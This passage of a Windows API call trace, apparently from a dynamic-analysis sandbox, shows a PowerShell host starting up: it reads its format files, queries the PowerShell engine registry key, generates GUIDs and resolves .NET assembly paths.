	[0315.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0315.152] SetErrorMode (uMode=0x1) returned 0x1
	[0315.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.153] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x308) returned 0x0
	[0315.153] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0315.153] CoTaskMemAlloc (cb=0x5a) returned 0x2f0d10
	[0315.153] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x2f0d10, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0315.153] CoTaskMemFree (pv=0x2f0d10) 
	[0315.153] RegCloseKey (hKey=0x308) returned 0x0
	[0315.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.168] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x2eb8636c, Data2=0x180d, Data3=0x46d8, Data4=([0]=0xb4, [1]=0xb9, [2]=0xa3, [3]=0x52, [4]=0x60, [5]=0x55, [6]=0x88, [7]=0xd6))) returned 0x0
	[0315.181] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xd99ca37d, Data2=0x7b3, Data3=0x459d, Data4=([0]=0xbd, [1]=0xba, [2]=0xca, [3]=0x80, [4]=0x21, [5]=0x40, [6]=0x3d, [7]=0x92))) returned 0x0
	[0315.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.183] SetErrorMode (uMode=0x1) returned 0x1
	[0315.183] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0315.183] GetFileType (hFile=0x308) returned 0x1
	[0315.183] SetErrorMode (uMode=0x1) returned 0x1
	[0315.183] GetFileType (hFile=0x308) returned 0x1
	[0315.183] ReadFile (in: hFile=0x308, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.184] ReadFile (in: hFile=0x308, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.184] ReadFile (in: hFile=0x308, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.185] ReadFile (in: hFile=0x308, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.185] ReadFile (in: hFile=0x308, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.732] ReadFile (in: hFile=0x308, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x1cceb8*=0xfb2, lpOverlapped=0x0) returned 1
	[0315.732] ReadFile (in: hFile=0x308, lpBuffer=0x32f753a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f753a*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.732] ReadFile (in: hFile=0x308, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.733] SetErrorMode (uMode=0x1) returned 0x1
	[0315.733] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0315.733] SetErrorMode (uMode=0x1) returned 0x1
	[0315.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.733] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x308) returned 0x0
	[0315.733] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0315.733] CoTaskMemAlloc (cb=0x5a) returned 0x2f0d10
	[0315.733] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x2f0d10, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0315.733] CoTaskMemFree (pv=0x2f0d10) 
	[0315.733] RegCloseKey (hKey=0x308) returned 0x0
	[0315.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.735] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xc8ddc57f, Data2=0x31b8, Data3=0x4944, Data4=([0]=0xac, [1]=0x17, [2]=0x61, [3]=0xe7, [4]=0xd8, [5]=0x44, [6]=0x4e, [7]=0x43))) returned 0x0
	[0315.737] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x7bfebf36, Data2=0xc78b, Data3=0x4dcf, Data4=([0]=0xbf, [1]=0x93, [2]=0x94, [3]=0x51, [4]=0x11, [5]=0xe2, [6]=0xdb, [7]=0x9b))) returned 0x0
	[0315.738] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x22375268, Data2=0x5e15, Data3=0x40c6, Data4=([0]=0xb6, [1]=0x3b, [2]=0xb7, [3]=0x9d, [4]=0x1f, [5]=0xc3, [6]=0xd1, [7]=0x65))) returned 0x0
	[0315.738] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x5484dfaa, Data2=0x7da5, Data3=0x481c, Data4=([0]=0x8c, [1]=0x1a, [2]=0xee, [3]=0xca, [4]=0x4a, [5]=0xb5, [6]=0x55, [7]=0x61))) returned 0x0
	[0315.738] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6e2e2a52, Data2=0x3cb, Data3=0x4e90, Data4=([0]=0xa7, [1]=0x34, [2]=0x46, [3]=0x3, [4]=0x24, [5]=0xbd, [6]=0xe7, [7]=0xba))) returned 0x0
	[0315.738] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe2dd6c31, Data2=0x7eee, Data3=0x4598, Data4=([0]=0xa9, [1]=0x3b, [2]=0x48, [3]=0x6e, [4]=0x74, [5]=0x12, [6]=0x25, [7]=0x42))) returned 0x0
	[0315.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.739] SetErrorMode (uMode=0x1) returned 0x1
	[0315.739] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0315.739] GetFileType (hFile=0x308) returned 0x1
	[0315.739] SetErrorMode (uMode=0x1) returned 0x1
	[0315.739] GetFileType (hFile=0x308) returned 0x1
	[0315.739] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.741] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.741] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.741] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.742] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.742] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.742] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0xaca, lpOverlapped=0x0) returned 1
	[0315.742] ReadFile (in: hFile=0x308, lpBuffer=0x33431b2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x33431b2*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.743] ReadFile (in: hFile=0x308, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.743] SetErrorMode (uMode=0x1) returned 0x1
	[0315.743] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0315.743] SetErrorMode (uMode=0x1) returned 0x1
	[0315.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.743] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x308) returned 0x0
	[0315.743] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0315.743] CoTaskMemAlloc (cb=0x5a) returned 0x2f0d10
	[0315.743] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x2f0d10, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0315.744] CoTaskMemFree (pv=0x2f0d10) 
	[0315.744] RegCloseKey (hKey=0x308) returned 0x0
	[0315.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0315.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0315.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0315.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0315.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0315.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0315.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0315.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0315.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0315.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0316.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0316.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0316.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0316.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0316.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0316.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0316.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0316.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0316.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
